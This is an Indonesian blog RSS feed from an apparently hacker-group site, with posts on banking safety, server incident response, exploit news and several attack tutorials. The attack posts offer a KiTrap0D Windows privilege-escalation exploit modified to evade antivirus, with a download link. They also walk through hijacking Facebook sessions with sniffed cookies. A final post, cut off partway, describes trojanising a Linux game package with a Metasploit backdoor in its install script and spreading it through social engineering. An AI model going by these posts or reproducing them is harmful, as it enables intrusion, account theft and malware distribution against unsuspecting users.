<p>Jangan pernah percaya dengan tawaran bantuan dari orang di sekitar mesin  ATM termasuk itu yang mengaku sebagai satpam atau petugas bank. Apabila  anda mengalami kesulitan, lebih baik telepon customer service bank dan  biarlah masalah anda diatasi oleh mereka – itu sebabnya mengapa anda  harus memiliki catatan nomor kontak resmi bank. Jangan pernah percaya  informasi dari orang lain di sekitar mesin ATM atau stiker yang seolah  menunjukkan nomor kontak resmi bank, karena bisa saja ternyata bukan dan  ini adalah jebakan pelaku fraud. Bila kartu anda tersangkut di mesin  ATM, maka tinggalkan saja tanpa melakukan apapun kecuali langsung  menghubungi CS bank segera diblokir dan meminta kartu baru. Ingat, dalam  prosedur pelaporan ini anda tidak akan diminta menyebut nomor PIN. Bila  CS atau yang mengaku CS bank menanyakan PIN, tutup saja teleponnya.</p>
<p>Jika anda merasa mengalami penipuan ataupun kejanggalan, lebih baik  laporkan kepada bank atau apabila anda telah menderita suatu kerugian,  laporkan kepada kepolisian terdekat.</p>
<p>Kewaspadaan yang sama harus anda terapkan ketika menggunakan Internet  banking. Syarat utama yang harus dipenuhi adalah memastikan bahwa  terminal akses yang anda gunakan aman. Gunakan selalu terminal akses  milik anda sendiri (misalnya laptop) yang anda yakini kemanannya. Bila  anda menggunakan terminal akses publik (misalnya di warnet, di kampus,  di kantor) atau milik orang lain maka pastikan bahwa terminal tersebut  bersih dari virus, trojan dan aplikasi berbahaya seperti key logger.  Anda harus melakukan hard booting terlebih dahulu sebelum bertransaksi  untuk menghapus sejumlah program jahat yang mungkin residen di memori  (misalnya key logger) dan melakukan scan menyeluruh dengan anti virus  serta anti malware terbaru (sejumlah aplikasi tools pemeriksa ini bisa  anda pasang di sebuah media penyimpan USB portabel). Proses ini perlu  waktu.</p>
<p>Anda juga harus membiasakan akses dengan menggunakan browser yang aman  atau menggunakan aplikasi browser portabel milik anda sendiri. Beberapa  layanan Internet banking sudah menyediakan keyboard virtual pada halaman  web sehingga anda tidak perlu memasukkan satu huruf atau angka pun dari  keyboard komputer. Cara ini lebih aman, namun ternyata belum semua bank  menerapkan. Anda juga harus dapat mengenali model penipuan menggunakan  teknik phising dan bagaimana cara menghindarinya serta disiplin untuk  tidak mengaktifkan opsi fitur otomatis merekam username dan password.  Setiap kali selesai melakukan transaksi, hapus pula cookies dan cache.</p>
<p>Tidak cukup sampai di situ, anda juga harus memastikan keamanan saluran  akses yang digunakan. Bertransaksi Internet banking menggunakan layanan  WiFi (wireless) di sebuah cafe adalah contoh yang sangat tidak  dianjurkan. Karena layanan WiFi sangat rawan penyadapan dan teknik ini  terlalu mudah untuk dilakukan. Bisa jadi seorang pengguna laptop yang  ada di seberang meja anda itulah attacker yang sedang menyadap semua  informasi penting dari laptop anda dan mencatat transaksi Internet  banking anda termasuk username, password bahkan algoritma token bank.</p>
<p>Perlu anda ketahui, walaupun sudah menggunakan pengaman token, namun  bukan berarti algoritma kunci dari tools ini tidak dapat didekripsi oleh  pelaku kejahatan. Dengan teknik tertentu token dapat dibobol dan  diduplikasi dengan menggunakan software tools pembongkar algoritma.</p>
<p>Menggunakan terminal yang bersih dan diyakini keamanannya serta saluran  fixed (kabel) private saat melakukan transaksi melalui Internet banking  adalah pilihan yang paling bijaksana.</p>
<p>Terakhir, menggunakan layanan SMS/mobile banking adalah jenis transaksi  yang paling tidak aman karena hanya mengandalkan otentikasi berdasarkan  nomor HP dan PIN. Tidak ada cara pengamanan tambahan misalnya koneksi  yang terenkripsi, metode otentikasi tambahan dan pemakaian token atau  one time access code. Anda perlu mengetahui bahwa nomor HP (di Indonesia  hampir semua operator menggunakan SIM/RUIM card) dapat dengan mudah  digandakan (cloning). Sedang PIN dapat dengan diperoleh misalnya melalui  social engineering. Maka, bila anda masih bisa melakukan transaksi  dengan cara lain, tidak selalu dalam kondisi mobile, tidak harus  melakukan transaksi segera, gunakanlah cara lain, hindari menggunakan  fasilitas dan fitur serta layanan SMS/mobile banking. Bahkan mungkin  saja anda tidak perlu mengaktifkan layanan ini apabila memang tidak  memerlukannya.</p>
<p>Ketika anda secara intensif memanfaatkan teknologi untuk memfasilitasi  dan mempermudah aktivitas kehidupan sehari-hari, maka sadarilah bahwa  anda juga harus memahami resiko yang menyertai dan memahami bagaimana  cara meminimalisir dampak yang mungkin terjadi. Perilaku waspada dan  sadar resiko itu menjadi tanggung jawab dan peran anda dalam upaya  pengamanan. Karena, your security is my security. Bukan hanya menjadi  urusan bank, pemerintah dan penyedia layanan.</p>
<p>Pihak Bank Indonesia, industri perbankan, aparat keamanan dan pemerintah  mempunyai kewajiban dan tanggung jawab kepada masyarakat untuk secara  berkelanjutan memberikan edukasi mengenal jenis layanan yang  memanfaatkan teknologi, karakteristik, aturan main dan resiko yang  mungkin saja terjadi. Kampanye semacam ini dapat mematikan niat dan  modus pelaku kejahatan.</p>
<p>(Indonesia Security Incident Response Team on Internet Infrastructure –  ID-SIRTII)</p></div>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2F7-kiat-menghindari-pembobolan-rekening.x&amp;linkname=7%20KIAT%20MENGHINDARI%20PEMBOBOLAN%20REKENING">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/7-kiat-menghindari-pembobolan-rekening.x/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>P3S (Pertolongan Pertama Pada Server)</title>
		<link>http://fvck.captureflags.com/p3s-pertolongan-pertama-pada-server.x</link>
		<comments>http://fvck.captureflags.com/p3s-pertolongan-pertama-pada-server.x#comments</comments>
		<pubDate>Tue, 09 Feb 2010 10:58:55 +0000</pubDate>
		<dc:creator>Xshadow</dc:creator>
				<category><![CDATA[defensing]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=378</guid>
		<description><![CDATA[mungkin bahasan ici cukup basi buat rekan2 yang sudah lama berkecimpung di dunia hosting&#8230; tapi apa salahnya jika diketahui orang lain&#8230; bahkan saya yakin 60% orang yang menyediakan layanan hosting masih belum tau hal ini apalagi pihak reseller  karena terbatasan akses dan pengetahuan yang mumpuni jelasnya 
ok langsung saja&#8230;
ketika website anda di deface atau [...]]]></description>
			<content:encoded><![CDATA[<p>mungkin bahasan ici cukup basi buat rekan2 yang sudah lama berkecimpung di dunia hosting&#8230; tapi apa salahnya jika diketahui orang lain&#8230; bahkan saya yakin 60% orang yang menyediakan layanan hosting masih belum tau hal ini apalagi pihak reseller <img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /> karena terbatasan akses dan pengetahuan yang mumpuni jelasnya <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>ok langsung saja&#8230;</p>
<p>ketika website anda di deface atau diserang atau apalah sebutannya&#8230; <span id="more-378"></span>apaperasaan anda? panik (sudah pasti), jengkel (sangat pasti), marah (masuk juga) dan macam2 perasaan anda&#8230; apalagi sampek dendam kesumat&#8230; hahaha&#8230;</p>
<p>langkah pertama,</p>
<p>ok yang pertama kali anda lakukan adalah segera confirmasi tindakan serangan tersbut kepada pihak hosting&#8230; saya yakin kalau pihak hosting profesional&#8230; pasti segera mensuspend account hosting anda dan account lainnya&#8230;</p>
<p>koq disuspend??</p>
<p>ya karena dengan suspend tersebut&#8230; backdoor atau php shell atau apalah yang sekiranya di akses secara clientside tidak akan bisa diakses&#8230; tapi jangan kuatir&#8230; account anda masih bisa diakses fia cpanel&#8230; tapi koq disuspend semua&#8230; ini memungkikan untuk menghindari attacker menanam phpshell di account milik orang lain, agak ribet memang&#8230; tapi ini tak lebih untuk menjaga keamanan bersama&#8230; tapi jumping attack atau eskalasi atau sejenisnya tergantung settingan dan penanganan server tersebut&#8230; istilahnya&#8230;&#8221;<em>ndelok sing nyekel disik</em>&#8221;</p>
<p>langkah kedua,</p>
<p>segera cari informasi ke tempat semua bug direport, misal milw0rm cari informasi bug cms yang anda gunakan&#8230; cari di tgl yang paling update&#8230; itu kalo cms anda adalah cms opensource macam joomla, wordpres atau cms-cms yg lain&#8230; jika tidak ada&#8230; sambil menunggu update bug terbaru biarkan account anda tersuspend&#8230; selagi menunggu tidak ada salahnya anda menghapus/ membackup database, data-data penting anda yang ada di hosting tersebut&#8230; kemudian ada beberapa opsi lanjutan</p>
<p>1. jika anda memakai cms opensource</p>
<p>jika sudah ada report di milw0rm atau site apalah segera menuju ke web resmi cms yang anda pakai&#8230; apakah sudah ada update untuk cms tersebut&#8230; jika belum ada&#8230; ada beberapa pilihan&#8230; baca report bug di site yang anda percaya&#8230; pelajari serta lakukan penge-patch-an sendiri <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>2. jika anda memakai cms buatan sendiri</p>
<p>anda yakin dengan kemampuan anda? ya tiap orang pasti egois dengan sifatnya <img src='http://fvck.captureflags.com/smilies/yahoo_tongue.gif' alt='&#58;&#80;' class='wp-smiley' width='18' height='18' title='&#58;&#80;' /> saya YAKIN&#8230; hehehe&#8230; kalo anda yakin&#8230; ya gak suah dibahas lagi&#8230; anda kan hebat&#8230; <img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /> saya yakin itu&#8230;. <img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /></p>
<p>jika anda tidak yakin&#8230; cari teman&#8230; atau kunjungi beberapa web forum tentang bahasan hacking dan lain2&#8230; kemudian cari bantuan kepada orang yang berwajib di site itu untuk membantu melakukan pentest kepada web anda&#8230; tentunya tidak secara ONLINE! melainkan dengan mengirimkan sample cms anda&#8230; jika ditemukan bugs&#8230; coba konsultasikan kepada yang melakukan pentest&#8230; dan jika hasilnya nihil&#8230; cari orang lain yang ingin melakukan ujicoba kepada cms buatan anda&#8230; semakin banyak yang melakukan pentest&#8230; ada web anda akan semakin kuat&#8230; begitu prinsip opensource <img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /> semakin banyak orang memakai aplikasi opensource&#8230; akan semakin banyak pula yang melakukan riset kepada aplikasi tersebut <img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /></p>
<p>dan jika benar2 bersih&#8230; ada kemungkinan adalanya eskalasi atau jumping attack atau serangan kepada server&#8230; web anda aman&#8230; tapi jika server yang diserang&#8230; web anda tidak ada gunanya <img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<p>3. opsi akhir</p>
<p>jika tidak ada tanggapan dan tidak profesionalnya pihak hosting&#8230;  ada baiknya anda coba server anda&#8230; lakukan penanaman php shell atau apalah yang sekiranya anda juga bisa menikmati serangan server tersbut&#8230; ujicoba bagaimana keamanan server tersebut&#8230; toh hosting yang murah2 dan lebih bagus masih bertebaran dimana2 <img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /></p>
<p>mungkin ini saja yang akan saya utarakan untuk sementara&#8230; dan tidak menutup kemungkinan <strong>P3S</strong> ini akan dilanjutkan ke point2 yang lain&#8230; saya rasa ini masih beberapa persen tulisan dari saya&#8230; mengingat keterbatasan waktu saya untuk menulis dan melakukan riset yang lain&#8230;</p>
<p>regard,</p>
<p>XLar</p>
<p>Captureflags</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fp3s-pertolongan-pertama-pada-server.x&amp;linkname=P3S%20%28Pertolongan%20Pertama%20Pada%20Server%29">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/p3s-pertolongan-pertama-pada-server.x/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>[sploit] kitrap0d &#8211; from limited user to system user on 5 seconds</title>
		<link>http://fvck.captureflags.com/sploit-kitrap0d-from-limited-user-to-system-user-on-5-seconds.x</link>
		<comments>http://fvck.captureflags.com/sploit-kitrap0d-from-limited-user-to-system-user-on-5-seconds.x#comments</comments>
		<pubDate>Sat, 06 Feb 2010 05:55:01 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[attacking]]></category>
		<category><![CDATA[0wn3d]]></category>
		<category><![CDATA[0wned]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[r00t]]></category>
		<category><![CDATA[r00ting]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rooting]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=370</guid>
		<description><![CDATA[baru &#8211; baru ini beredar sebuah  exploit dengan nama &#8216;kitrap0d&#8216;.exploit  ini berfungsi sebagai &#8216;priviledge escalation&#8217;(local ring0) atau local root exploit di mesin windows..menurut pembuatnya exploit ini mampu bekerja di semua mesin windows.mulai dari windows NT sampe windows seven(7)
tapi exploit ini sudah banyak di deteksi oleh antivirus.oleh karena itu tim captureflags.com memodifikasi componen kitrap0d(vdmexploit.dll) [...]]]></description>
			<content:encoded><![CDATA[<p>baru &#8211; baru ini beredar sebuah  exploit dengan nama &#8216;<strong>kitrap0d</strong>&#8216;.exploit  ini berfungsi sebagai &#8216;priviledge escalation&#8217;(local ring0) atau local root exploit di mesin windows..menurut pembuatnya exploit ini mampu bekerja di semua mesin windows.mulai dari windows NT sampe windows seven(7)</p>
<p>tapi exploit ini sudah banyak di deteksi oleh antivirus.oleh karena itu <strong>tim captureflags.com</strong> memodifikasi componen kitrap0d(vdmexploit.dll) sehingga <strong>tidak bisa di deteksi </strong>oleh antivirus.</p>
<p>demo kali ini memperlihatkan cara kerja exploit ini di mesin winxp sp2&#8230;</p>
<p>let&#8217;s rock again</p>
<p>1.tampilan windows sebelum exploit di eksekusi<br />
  <a href="http://fvck.captureflags.com/wp-content/uploads/1.jpg"><img src="http://fvck.captureflags.com/wp-content/uploads/1-300x169.jpg" alt="" title="1" width="300" height="169" class="aligncenter size-medium wp-image-371" /></a><br />
  dari gambar di atas dilihat bahwa user yang login adalah user dengan hak terbatas..</p>
<p>2.setelah itu jalankan exploit kitrap0d dengan men-double click <strong>vdmallowed.exe</strong>..<br />
  ph3333rrrrr&#8230;.keluar sebuh command promt baru dari hasil exploit tadi.command prompt ini di jalankan oleh user system.<br />
  cara pembuktiannya,matikan explorer dari taskmanager.setelah itu pada command prompt yang baru ketik explorer<br />
   bisa dilihat ada pergantian user menjadi user system tanpa <strong>restart komputer sekalipun</strong><br />
  <a href="http://fvck.captureflags.com/wp-content/uploads/2.jpg"><img src="http://fvck.captureflags.com/wp-content/uploads/2-300x169.jpg" alt="" title="2" width="300" height="169" class="aligncenter size-medium wp-image-372" /></a></p>
<p>seperti yang di jelasin diatas,exploit kitrap0d yang beredar kebanyakan sudah dideteksi oleh AV sebagai exploit pack<br />
so,tim captureflags memodifikasi exploit biar gk kedetek ama AV..<img src='http://fvck.captureflags.com/smilies/yahoo_tongue.gif' alt='&#58;&#112;' class='wp-smiley' width='18' height='18' title='&#58;&#112;' /></p>
<p>sebelum di modifikasi:<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/12.png"><img src="http://fvck.captureflags.com/wp-content/uploads/12-300x169.png" alt="" title="1" width="300" height="169" class="aligncenter size-medium wp-image-373" /></a><br />
exploit di deteksi oleh 27 AV..</p>
<p>exploit setelah di modifikasi:<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/21.png"><img src="http://fvck.captureflags.com/wp-content/uploads/21-300x169.png" alt="" title="2" width="300" height="169" class="aligncenter size-medium wp-image-374" /></a></p>
<p>wuiihhhh.hanya 5 dari 40 AV yang bisa mendeteksi&#8230;</p>
<p>download : <a href='http://fvck.captureflags.com/wp-content/uploads/KiTrap0D_modified.tar.gz'>KiTrap0D_modified.tar</a></p>
<p>enjoyyy&#8230;.!!!!</p>
<p>captureflags team : xshadow &#038; laharisi</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fsploit-kitrap0d-from-limited-user-to-system-user-on-5-seconds.x&amp;linkname=%5Bsploit%5D%20kitrap0d%20%26%238211%3B%20from%20limited%20user%20to%20system%20user%20on%205%20seconds">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/sploit-kitrap0d-from-limited-user-to-system-user-on-5-seconds.x/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>sidejacking dengan hamster</title>
		<link>http://fvck.captureflags.com/sidejacking-dengan-hamster.x</link>
		<comments>http://fvck.captureflags.com/sidejacking-dengan-hamster.x#comments</comments>
		<pubDate>Fri, 05 Feb 2010 11:13:03 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[0wned]]></category>
		<category><![CDATA[attacking]]></category>
		<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[pentesting with backtrack]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=356</guid>
		<description><![CDATA[hello world..
sidejacking merupakan teknik &#8216;pembajakan session&#8217; dari sebuah komunikasi TCP/IP.mirip sama session hijacking
attacker menggunakan paket sniffing misalnya wireshark memcapture semua komunikasi yang ada pada jaringan.setelah itu attacker mencari session atau cookie dari hasil caputer tadi.
 teknik seperti ini bisa di gunakan sebagai alternatif..misalnya ketika melakukan sniffing tidak berhasil gara2 target yang di sniffing menerapkan proteksi [...]]]></description>
			<content:encoded><![CDATA[<p>hello world..</p>
<p>sidejacking merupakan teknik &#8216;pembajakan session&#8217; dari sebuah komunikasi TCP/IP.mirip sama session hijacking<br />
attacker menggunakan paket sniffing misalnya wireshark memcapture semua komunikasi yang ada pada jaringan.setelah itu attacker mencari session atau cookie dari hasil caputer tadi.</p>
<p> teknik seperti ini bisa di gunakan sebagai alternatif..misalnya ketika melakukan sniffing tidak berhasil gara2 target yang di sniffing menerapkan proteksi diantaranya antiarp,antinetcut dll yang menyebabkan teknik arp poisonong tidak bisa di gunakan.</p>
<p>ok..let&#8217;s rock..</p>
<p>tools :<br />
1.backtrack 4 final ( os lain juga bisa)<br />
2.wireshark<br />
3.hamster dan ferret ( uda ada dalam backtrack 4)</p>
<p>1.capture paket &#8211; paket yang ada pada jaringan dengan wireshark<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/11.png"><img src="http://fvck.captureflags.com/wp-content/uploads/11-300x226.png" alt="" title="1" width="300" height="226" class="aligncenter size-medium wp-image-357" /></a><br />
<span id="more-356"></span></p>
<p>2.setelah paket yang terkumpul uda banyak,simpan hasil capture tersebut,misalnya di direktory /pentest/sniffers/hamster dengan nama capture.pcap</p>
<p>3.buka terminal atau console.setelah itu jalankan ferret untuk membaca file hasil capture tadi ( capture.pcap )</p>
<p><a href="http://fvck.captureflags.com/wp-content/uploads/32.png"><img src="http://fvck.captureflags.com/wp-content/uploads/32-300x141.png" alt="" title="3" width="300" height="141" class="aligncenter size-medium wp-image-359" /></a><br />
setelah di baca dengan ferret,hasilnya berupa file hamster.txt</p>
<p>4.jalankan hamster..<br />
  <a href="http://fvck.captureflags.com/wp-content/uploads/51.png"><img src="http://fvck.captureflags.com/wp-content/uploads/51-300x170.png" alt="" title="5" width="300" height="170" class="aligncenter size-medium wp-image-360" /></a><br />
5.keadaan sebelum sesi di bajak..<br />
  <a href="http://fvck.captureflags.com/wp-content/uploads/61.png"><img src="http://fvck.captureflags.com/wp-content/uploads/61-300x215.png" alt="" title="6" width="300" height="215" class="aligncenter size-medium wp-image-361" /></a></p>
<p>6.buka browser&#8230;setelah tu setting proxy browser menjadi http://127.0.0.1 port 1234<br />
   akses http://hamster<br />
   <a href="http://fvck.captureflags.com/wp-content/uploads/71.png"><img src="http://fvck.captureflags.com/wp-content/uploads/71-300x215.png" alt="" title="7" width="300" height="215" class="aligncenter size-medium wp-image-362" /></a></p>
<p>klik ip yang ingin di lihat sesinya&#8230;pada gambar diatas misalnya 192.168.1.30<br />
pada bagian kiri terdapat cookie dari ip 192.168.1.30..<br />
untuk membajak sessi dari ip tersebut,tinggal klik salah satu link yang ada..misalnya link www.facebook.com<br />
Binggo&#8230;..!!!!!<br />
tanpa memasukan username dan password kita sudah bisa masuk ke halaman facebook&#8230;<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/8.png"><img src="http://fvck.captureflags.com/wp-content/uploads/8-300x215.png" alt="" title="8" width="300" height="215" class="aligncenter size-medium wp-image-363" /></a></p>
<p>&#8212; hacking never die &#8212;&#8212;-</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fsidejacking-dengan-hamster.x&amp;linkname=sidejacking%20dengan%20hamster">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/sidejacking-dengan-hamster.x/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Backtrack 4 final is out</title>
		<link>http://fvck.captureflags.com/backtrack-4-final-is-out.x</link>
		<comments>http://fvck.captureflags.com/backtrack-4-final-is-out.x#comments</comments>
		<pubDate>Tue, 12 Jan 2010 01:58:32 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[attacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[rooting]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=352</guid>
		<description><![CDATA[
setelah di mengalami proses perbaikan &#8211; perbaikan dari versi sebelumnya tim backtrack 4 akhirnya menyelesaikan backtrack 4 final..pokoknya lebih keren dari versi sebelumnya..
misalnya penambahan Gerix wifi cracker yang mempermudah cracking WEP atau WPA..
downloadnya ada 2 jenis : iso dan vmware image..
1.iso :
    download : backtrack 4 iso
    Size: 1570 [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://fvck.captureflags.com/wp-content/uploads/bt.png"><img src="http://fvck.captureflags.com/wp-content/uploads/bt.png" alt="" title="bt" width="535" height="231" class="aligncenter size-full wp-image-353" /></a></p>
<p>setelah di mengalami proses perbaikan &#8211; perbaikan dari versi sebelumnya tim backtrack 4 akhirnya menyelesaikan backtrack 4 final..pokoknya lebih keren dari versi sebelumnya..<img src='http://fvck.captureflags.com/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /><br />
misalnya penambahan Gerix wifi cracker yang mempermudah cracking WEP atau WPA..</p>
<p>downloadnya ada 2 jenis : iso dan vmware image..<br />
1.iso :<br />
    download : <a href="http://www.backtrack-linux.org/download.php?fname=bt4f">backtrack 4 iso</a><br />
    Size: 1570 MB<br />
    MD5: af139d2a085978618dc53cabc67b9269<br />
2.vmware image<br />
    download :  <a href="http://www.backtrack-linux.org/download.php?fname=bt4fvm">backtrack vmware image</a><br />
    Size: 2000 MB<br />
    MD5: 733b47fad1d56d31bc63c16b3706a11c</p>
<p>enjoy&#8230;..<img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /></p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fbacktrack-4-final-is-out.x&amp;linkname=Backtrack%204%20final%20is%20out">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/backtrack-4-final-is-out.x/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>[News] &#8211; New Exploit databases</title>
		<link>http://fvck.captureflags.com/news-new-exploit-databases.x</link>
		<comments>http://fvck.captureflags.com/news-new-exploit-databases.x#comments</comments>
		<pubDate>Tue, 17 Nov 2009 03:11:35 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[attacking]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[r00ting]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=347</guid>
		<description><![CDATA[akhirnya setelah nunggu beberapa lama online exploit databases yang baru hadir juga..
project ini di gagas oleh team dari offensive security(http://www.offensive-security.com) dan gerix.it(http://gerix.it/).
keunggulan dari sistem database ini adalah aplikasi yang di pakai dalam system exploitasi akan di cantumkan link url download&#8230;so download program and coba exploitnya&#8230;.
ohh ia,archive ini merupakan backup dari milw0rm.com&#8230;exploit yang ada di milw0rm [...]]]></description>
			<content:encoded><![CDATA[<p>akhirnya setelah nunggu beberapa lama online exploit databases yang baru hadir juga..<br />
project ini di gagas oleh team dari <strong>offensive security</strong>(<a href="http://www.offensive-security.com">http://www.offensive-security.com</a>) dan <strong>gerix.it</strong>(<a href="http://gerix.it/">http://gerix.it/</a>).<br />
keunggulan dari sistem database ini adalah aplikasi yang di pakai dalam system exploitasi akan di cantumkan link url download&#8230;so download program and coba exploitnya&#8230;.<img src='http://fvck.captureflags.com/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /><br />
ohh ia,archive ini merupakan backup dari <strong>milw0rm.com</strong>&#8230;exploit yang ada di milw0rm bisa di jumpai pada archive yang baru ini</p>
<p>neh dia link new exploit databases <a href="http://exploits.offensive-security.com">http://exploits.offensive-security.com</a></p>
<p>hope you enjoy&#8230;.</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fnews-new-exploit-databases.x&amp;linkname=%5BNews%5D%20%26%238211%3B%20New%20Exploit%20databases">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/news-new-exploit-databases.x/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>binary linux backdoor</title>
		<link>http://fvck.captureflags.com/binary-linux-backdoor.x</link>
		<comments>http://fvck.captureflags.com/binary-linux-backdoor.x#comments</comments>
		<pubDate>Sat, 17 Oct 2009 11:05:43 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[attacking]]></category>
		<category><![CDATA[0wn3d]]></category>
		<category><![CDATA[0wned]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=323</guid>
		<description><![CDATA[hallo all
disini saya coba jelasin tentang binary linux backdoor.okeh..
dari juduna uda jelas..heheheh&#8230;buat backdoor buat linux.
idenya memfaatkan payload linux dari metasploit untuk membuat backdoor.
skenario :
1.buat backdoor pake payload-na metasploit
2.binary backdoor tersebut di bundle dengan aplikasi linux..misalnya game ato yang lain.
3.setup payload handlernya pake metasploit
4.kirimin paket tersebut ke orang2..pake soceng dikitlah..hehehe
5.got connection back dari user..
6.not root..??? crack [...]]]></description>
			<content:encoded><![CDATA[<p>hallo all</p>
<p>disini saya coba jelasin tentang binary linux backdoor.okeh..<br />
dari juduna uda jelas..heheheh&#8230;buat backdoor buat linux.</p>
<p>idenya memfaatkan payload linux dari metasploit untuk membuat backdoor.<br />
skenario :<br />
1.buat backdoor pake payload-na metasploit<br />
2.binary backdoor tersebut di bundle dengan aplikasi linux..misalnya game ato yang lain.<br />
3.setup payload handlernya pake metasploit<br />
4.kirimin paket tersebut ke orang2..pake soceng dikitlah..hehehe<br />
5.got connection back dari user..<br />
6.not root..??? crack dengan localroot exploit.</p>
<p>tested : ubuntu 8.10</p>
<p>okeh,,langsung ke tkp<span id="more-323"></span><br />
aplikasi yang dipake adalah ninvaders_0.1.1-2_i386.deb..ini adalah game yang bisa di mainkan di konsole linux&#8230;googling for more info<img src='http://fvck.captureflags.com/smilies/yahoo_tongue.gif' alt='&#58;&#80;' class='wp-smiley' width='18' height='18' title='&#58;&#80;' /></p>
<p>step &#8211; step :</p>
<p>download paket gamenya dulu..setelah itu bikin directory buat nampung file &#8211; file yang dibutuhkan<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/1.png"><img src="http://fvck.captureflags.com/wp-content/uploads/1-300x225.png" alt="1" title="1" width="300" height="225" class="aligncenter size-medium wp-image-326" /></a></p>
<p>ekstrak file yang uda didownload..jangan lupa buat direktori <strong>DEBIAN</strong> untuk menampung skrip instalasi<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/2.png"><img src="http://fvck.captureflags.com/wp-content/uploads/2-300x225.png" alt="2" title="2" width="300" height="225" class="aligncenter size-medium wp-image-336" /></a></p>
<p>pada direktori DEBIAN,buatlah file <strong>control</strong> dan file <strong>postinst</strong>..file control berguna sebagai deskripsi dari paket yang akan dibuat n file postinst berfungsi pada saat instalasi backdoor langsung di eksekusi..<br />
contoh file control<br />
<code>Package: ninvaders<br />
